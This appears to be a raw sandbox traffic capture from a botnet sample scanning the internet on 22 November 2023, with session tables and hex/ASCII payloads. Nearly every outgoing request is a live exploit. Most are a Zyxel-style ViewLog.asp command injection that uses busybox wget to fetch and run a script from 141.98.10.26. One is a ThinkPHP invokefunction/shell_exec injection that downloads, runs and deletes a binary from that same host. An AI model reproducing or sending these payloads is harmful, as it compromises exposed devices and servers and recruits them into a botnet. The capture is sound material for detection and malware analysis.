Session ID	Source IP	Source Port	Destination IP	Destination Port
394	192.168.2.23	35618	85.122.219.31	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:53.704180956 CET	7788	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
395	192.168.2.23	48632	62.122.189.10	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:53.781902075 CET	7791	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:53.974797964 CET	7796	IN	HTTP/1.1 401 Unauthorized Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: Accept, Accept-Encoding, Authorization, Cache-Control, Content-Type, Content-Length, Origin, X-Real-IP, X-CSRF-Token Access-Control-Allow-Methods: GET, POST, PATCH, PUT, DELETE, OPTIONS Access-Control-Allow-Origin: http://62.122.189.10 Access-Control-Max-Age: 7200 Content-Type: application/json; charset=utf-8 Www-Authenticate: Bearer X-Request-Id: 44ef8ea3-ad7d-4fed-910c-a7bea3cde746 Date: Wed, 22 Nov 2023 07:38:53 GMT Content-Length: 77 Connection: close Data Raw: 7b 22 65 72 72 6f 72 22 3a 22 54 68 65 20 72 65 71 75 69 72 65 64 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 68 65 61 64 73 20 77 65 72 65 20 6e 6f 74 20 70 72 65 73 65 6e 74 20 69 6e 20 74 68 65 20 72 65 71 75 65 73 74 2e 22 7d Data Ascii: {"error":"The required authorization heads were not present in the request."}

Session ID	Source IP	Source Port	Destination IP	Destination Port
396	192.168.2.23	44716	94.64.12.50	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:53.816253901 CET	7793	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:54.048964024 CET	7798	IN	HTTP/1.1 404 Not Found Date: Wed, 22 Nov 2023 09:38:51 GMT Server: web X-Frame-Options: SAMEORIGIN Cache-Control: no-cache Content-Length: 166 Content-Type: text/html Connection: keep-alive Keep-Alive: timeout=60, max=99 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
397	192.168.2.23	47432	95.59.48.164	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:54.187643051 CET	7811	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:54.443689108 CET	7836	IN	HTTP/1.1 200 OK
Nov 22, 2023 08:38:54.447935104 CET	7846	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
398	192.168.2.23	39878	94.131.62.43	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:54.490674019 CET	7906	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:54.595901966 CET	7909	IN	HTTP/1.1 400 Bad Request Server: squid/6.0.0-20220501-re899e0c27 Mime-Version: 1.0 Date: Wed, 22 Nov 2023 07:38:54 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3572 X-Squid-Error: ERR_INVALID_URL 0 Vary: Accept-Language Content-Language: en Cache-Status: ezproxies.com Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, s

Session ID	Source IP	Source Port	Destination IP	Destination Port
399	192.168.2.23	47480	62.29.115.112	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:54.601843119 CET	7913	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
400	192.168.2.23	36020	94.122.11.12	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:54.602437019 CET	7913	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
401	192.168.2.23	60702	31.200.37.126	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:54.602577925 CET	7914	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
402	192.168.2.23	39332	94.120.45.118	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:54.602677107 CET	7914	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
403	192.168.2.23	37900	31.184.196.227	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:54.621541977 CET	7915	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:54.837677956 CET	7932	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:38:54 GMT Server: Apache Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
404	192.168.2.23	35768	31.136.235.93	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:55.006093979 CET	7935	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:55.562752962 CET	8047	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:56.682570934 CET	8175	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:59.082236052 CET	8440	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:03.689599991 CET	9036	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:12.648332119 CET	10045	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:32.101613998 CET	12400	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:08.960479975 CET	16779	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
405	192.168.2.23	37562	31.136.253.60	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:55.006390095 CET	7935	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:55.562743902 CET	8047	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:56.682576895 CET	8176	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:59.082226038 CET	8440	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:03.689606905 CET	9036	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
